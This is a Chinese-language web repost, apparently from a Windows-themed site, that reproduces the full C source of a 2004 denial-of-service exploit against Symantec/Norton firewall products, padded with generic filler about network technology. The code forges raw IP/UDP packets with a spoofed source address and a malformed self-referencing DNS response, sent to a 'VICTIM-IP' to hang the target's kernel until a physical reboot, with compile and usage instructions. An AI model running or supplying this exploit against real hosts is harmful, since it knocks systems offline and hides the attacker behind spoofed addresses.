发布时间:2023-09-14 来源:win7旗舰版 浏览量:
网络技术是从1990年代中期发展起来的新技术,它把互联网上分散的资源融为有机整体,实现资源的全面共享和有机协作,使人们能够透明地使用资源的整体能力并按需获取信息。资源包括高性能计算机、存储资源、数据资源、信息资源、知识资源、专家资源、大型数据库、网络、传感器等。 当前的互联网只限于信息共享,网络则被认为是互联网发展的第三阶段。 赛门铁客防火墙D.o.s攻击代码 名称:HOD-symantec-firewall-DoS-expl.c: 版本:Version 0.1 coded by houseofdabus 翻译:luoluo 漏洞发现:www.eEye.com 漏洞描述:http://www.eeye.com/html/Research/Advisories/AD20040512B.html * ------------------------------------------------------------------- * 程序测试: * - Symantec Norton Personal Firewall 2004 * 受影响产品: * - Symantec Norton Internet Security 2002 * - Symantec Norton Internet Security 2003 * - Symantec Norton Internet Security 2004 * - Symantec Norton Internet Security Professional 2002 * - Symantec Norton Internet Security Professional 2003 * - Symantec Norton Internet Security Professional 2004 * - Symantec Norton Personal Firewall 2002 * - Symantec Norton Personal Firewall 2003 * - Symantec Norton Personal Firewall 2004 * - Symantec Client Firewall 5.01, 5.1.1 * - Symantec Client Security 1.0, 1.1, 2.0(SCF 7.1) * - Symantec Norton AntiSpam 2004 * ------------------------------------------------------------------- * 说明: eEye Digital Security 现已发现在 Symantec 防火墙系列产品中存在的第二个安全漏洞,该漏洞可以被远程探测,并被利用来针对受影响系统进行拒绝服务攻击. 通过发送单个恶意 DNS (UDP 端口 53)响应包给存在漏洞的主机, 攻击者可以使 Symantec DNS 响应确认代码在内核中进入死循环,直至系统崩溃。受攻击主机只能通过物理重启,才能恢复运行. * ------------------------------------------------------------------- * 编译: * Win32/VC++ : cl -o HOD-sym-DoS-expl HOD-sym-DoS-expl.c ws2_32.lib * Win32/cygwin: gcc -o HOD-sym-DoS-expl HOD-sym-DoS-expl.c -lws2_32.lib * Linux : gcc -o HOD-sym-DoS-expl HOD-sym-DoS-expl.c -Wall * ------------------------------------------------------------------- * 命令行参数/说明: * HOD-symantec-firewall-DoS-expl [-fi:str] [-tp:int] [-ti:str] [-n:int] * -fi:IP From (sender) IP address * -tp:int To (recipient) port number * -ti:IP To (recipient) IP address * -n:int Number of times to send message * */ #ifdef _WIN32 #pragma comment(lib,"ws2_32") #pragma pack(1) #define WIN32_LEAN_AND_MEAN #include <winsock2.h> #include <ws2tcpip.h> /* IP_HDRINCL */ #include <stdio.h> #include <stdlib.h> #else #include <sys/types.h> #include <netinet/in.h> #include <sys/socket.h> #include <stdio.h> #include <stdlib.h> #include <arpa/inet.h> #include <netdb.h> #include <sys/timeb.h> #include <string.h> #endif #define MAX_MESSAGE 4068 #define MAX_PACKET 4096 #define DEFAULT_PORT 53 #define DEFAULT_IP "10.0.0.1" #define DEFAULT_COUNT 1 #ifndef _WIN32 # define FAR #endif /* Define the DNS header */ char dnsreply[] = "\xc9\x9c" /* Transaction ID */ "\x80\x00" /* Flags (bit 15: response) */ "\x00\x01" /* Number of questions */ "\x00\x01" /* Number of answer RRs */ "\x00\x00" /* Number of authority RRs */ "\x00\x00" /* Number of additional RRs */ "\xC0\x0C"; /* Compressed name pointer to itself */ /* Define the IP header */ typedef struct ip_hdr { unsigned char ip_verlen; /* IP version & length */ unsigned char ip_tos; /* IP type of service */ unsigned short ip_totallength; /* Total length */ unsigned short ip_id; /* Unique identifier */ unsigned short ip_offset; /* Fragment offset field */ unsigned char ip_ttl; /* Time to live */ unsigned char ip_protocol; /* Protocol */ unsigned short ip_checksum; /* IP checksum */ unsigned int ip_srcaddr; /* Source address */ unsigned int ip_destaddr; /* Destination address */ } IP_HDR, *PIP_HDR, FAR* LPIP_HDR; /* Define the UDP header */ typedef struct udp_hdr { unsigned short src_portno; /* Source port number */ unsigned short dst_portno; /* Destination port number */ unsigned short udp_length; /* UDP packet length */ unsigned short udp_checksum; /* UDP checksum (optional) */ } UDP_HDR, *PUDP_HDR; /* globals */ unsigned long dwToIP, // IP to send to dwFromIP; // IP to send from (spoof) unsigned short iToPort, // Port to send to iFromPort; // Port to send from (spoof) unsigned long dwCount; // Number of times to send char strMessage[MAX_MESSAGE]; // Message to send void usage(char *progname) { printf("Usage:\n\n"); printf("%s <-fi:SRC-IP> <-ti:VICTIM-IP> [-tp:DST-PORT] [-n:int]\n\n", progname); printf(" -fi:IP From (sender) IP address\n"); printf(" -tp:int To (recipient) open UDP port number:\n"); printf(" 137, 138, 445, 500(default)\n"); printf(" -ti:IP To (recipient) IP address\n"); printf(" -n:int Number of times\n"); exit(1); } void ValidateArgs(int argc, char **argv) { int i; iToPort = 500; iFromPort = DEFAULT_PORT; dwToIP = inet_addr(DEFAULT_IP); dwFromIP = inet_addr(DEFAULT_IP); dwCount = DEFAULT_COUNT; memcpy(strMessage, dnsreply, sizeof(dnsreply)-1); for(i = 1; i < argc; i++) { if ((argv[i][0] == '-') (argv[i][0] == '/')) { switch (tolower(argv[i][1])) { case 'f': switch (tolower(argv[i][2])) { case 'i': if (strlen(argv[i]) > 4) dwFromIP = inet_addr(&argv[i][4]); break; default: usage(argv[0]); break; } break; case 't': switch (tolower(argv[i][2])) { case 'p': if (strlen(argv[i]) > 4) iToPort = atoi(&argv[i][4]); break; case 'i': if (strlen(argv[i]) > 4) dwToIP = inet_addr(&argv[i][4]); break; default: usage(argv[0]); break; } break; case 'n': if (strlen(argv[i]) > 3) dwCount = atol(&argv[i][3]); break; default: usage(argv[0]); break; } } } return; } /* This function calculates the 16-bit one's complement sum */ /* for the supplied buffer */ unsigned short checksum(unsigned short *buffer, int size) { unsigned long cksum=0; while (size > 1) { cksum += *buffer++; size -= sizeof(unsigned short); } if (size) { cksum += *(unsigned char *)buffer; } cksum = (cksum >> 16) + (cksum & 0xffff); cksum += (cksum >>16); return (unsigned short)(~cksum); } int main(int argc, char **argv) { #ifdef _WIN32 WSADATA wsd; #endif int s; #ifdef _WIN32 BOOL bOpt; #else int bOpt; #endif struct sockaddr_in remote; IP_HDR ipHdr; UDP_HDR udpHdr; int ret; unsigned long i; unsigned short iTotalSize, iUdpSize, iUdpChecksumSize, iIPVersion, iIPSize, cksum = 0; char buf[MAX_PACKET], *ptr = NULL; #ifdef _WIN32 IN_ADDR addr; #else struct sockaddr_in addr; #endif printf("\nSymantec Multiple Firewall DNS Response Denial-of-Service exploit v0.1\n"); printf("Bug discoveried by eEye:\n"); printf("http://www.eeye.com/html/Research/Advisories/AD20040512B.html\n\n"); printf("--- Coded by .::[ houseofdabus ]::. ---\n\n"); if (argc < 3) usage(argv[0]); /* Parse command line arguments and print them out */ ValidateArgs(argc, argv); #ifdef _WIN32 addr.S_un.S_addr = dwFromIP; printf("[*] From IP: <%s>, port: %d\n", inet_ntoa(addr), iFromPort); addr.S_un.S_addr = dwToIP; printf("[*] To IP: <%s>, port: %d\n", inet_ntoa(addr), iToPort); printf("[*] Count: %d\n", dwCount); #else addr.sin_addr.s_addr = dwFromIP; printf("[*] From IP: <%s>, port: %d\n", inet_ntoa(addr.sin_addr), iFromPort); addr.sin_addr.s_addr = dwToIP; printf("[*] To IP: <%s>, port: %d\n", inet_ntoa(addr.sin_addr), iToPort); printf("[*] Count: %d\n", dwCount); #endif #ifdef _WIN32 if (WSAStartup(MAKEWORD(2,2), &wsd) != 0) { printf("[-] WSAStartup() failed: %d\n", GetLastError()); return -1; } #endif /* Creating a raw socket */ s = socket(AF_INET, SOCK_RAW, IPPROTO_UDP); #ifdef _WIN32 if (s == INVALID_SOCKET) { printf("[-] WSASocket() failed: %d\n", WSAGetLastError()); return -1; } #endif /* Enable the IP header include option */ #ifdef _WIN32 bOpt = TRUE; #else bOpt = 1; #endif ret = setsockopt(s, IPPROTO_IP, IP_HDRINCL, (char *)&bOpt, sizeof(bOpt)); #ifdef _WIN32 if (ret == SOCKET_ERROR) { printf("[-] setsockopt(IP_HDRINCL) failed: %d\n", WSAGetLastError()); return -1; } #endif /* Initalize the IP header */ iTotalSize = sizeof(ipHdr) + sizeof(udpHdr) + sizeof(dnsreply)-1; iIPVersion = 4; iIPSize = sizeof(ipHdr) / sizeof(unsigned long); ipHdr.ip_verlen = (iIPVersion << 4) | iIPSize; ipHdr.ip_tos = 0; /* IP type of service */ ipHdr.ip_totallength = htons(iTotalSize); /* Total packet len */ ipHdr.ip_id = 0; /* Unique identifier: set to 0 */ ipHdr.ip_offset = 0; /* Fragment offset field */ ipHdr.ip_ttl = 128; /* Time to live */ ipHdr.ip_protocol = 0x11; /* Protocol(UDP) */ ipHdr.ip_checksum = 0 ; /* IP checksum */ ipHdr.ip_srcaddr = dwFromIP; /* Source address */ ipHdr.ip_destaddr = dwToIP; /* Destination address */ /* Initalize the UDP header */ iUdpSize = sizeof(udpHdr) + sizeof(dnsreply)-1; udpHdr.src_portno = htons(iFromPort) ; udpHdr.dst_portno = htons(iToPort) ; udpHdr.udp_length = htons(iUdpSize) ; udpHdr.udp_checksum = 0 ; iUdpChecksumSize = 0; ptr = buf; memset(buf, 0, MAX_PACKET); memcpy(ptr, &ipHdr.ip_srcaddr, sizeof(ipHdr.ip_srcaddr)); ptr += sizeof(ipHdr.ip_srcaddr); iUdpChecksumSize += sizeof(ipHdr.ip_srcaddr); memcpy(ptr, &ipHdr.ip_destaddr, sizeof(ipHdr.ip_destaddr)); ptr += sizeof(ipHdr.ip_destaddr); iUdpChecksumSize += sizeof(ipHdr.ip_destaddr); ptr++; iUdpChecksumSize += 1; memcpy(ptr, &ipHdr.ip_protocol, sizeof(ipHdr.ip_protocol)); ptr += sizeof(ipHdr.ip_protocol); iUdpChecksumSize += sizeof(ipHdr.ip_protocol); memcpy(ptr, &udpHdr.udp_length, sizeof(udpHdr.udp_length)); ptr += sizeof(udpHdr.udp_length); iUdpChecksumSize += sizeof(udpHdr.udp_length); memcpy(ptr, &udpHdr, sizeof(udpHdr)); ptr += sizeof(udpHdr); iUdpChecksumSize += sizeof(udpHdr); for(i = 0; i < sizeof(dnsreply)-1; i++, ptr++) *ptr = strMessage[i]; iUdpChecksumSize += sizeof(dnsreply)-1; cksum = checksum((unsigned short *)buf, iUdpChecksumSize); udpHdr.udp_checksum = cksum; memset(buf, 0, MAX_PACKET); ptr = buf; memcpy(ptr, &ipHdr, sizeof(ipHdr)); ptr += sizeof(ipHdr); memcpy(ptr, &udpHdr, sizeof(udpHdr)); ptr += sizeof(udpHdr); memcpy(ptr, strMessage, sizeof(dnsreply)-1); remote.sin_family = AF_INET; remote.sin_port = htons(iToPort); remote.sin_addr.s_addr = dwToIP; for(i = 0; i < dwCount; i++) { #ifdef _WIN32 ret = sendto(s, buf, iTotalSize, 0, (SOCKADDR *)&remote, sizeof(remote)); if (ret == SOCKET_ERROR) { printf("[-] sendto() failed: %d\n", WSAGetLastError()); break; } else #else ret = sendto(s, buf, iTotalSize, 0, (struct sockaddr *) &remote, sizeof(remote)); #endif printf("[+] sent %d bytes\n", ret); } #ifdef _WIN32 closesocket(s); WSACleanup(); #endif return 0; } (出处:viphot) 网络的神奇作用吸引着越来越多的用户加入其中,正因如此,网络的承受能力也面临着越来越严峻的考验―从硬件上、软件上、所用标准上......,各项技术都需要适时应势,对应发展,这正是网络迅速走向进步的催化剂。 |
赛门铁客防火墙D.o.s攻击代码 名称:HOD-symantec-firewall-DoS-exp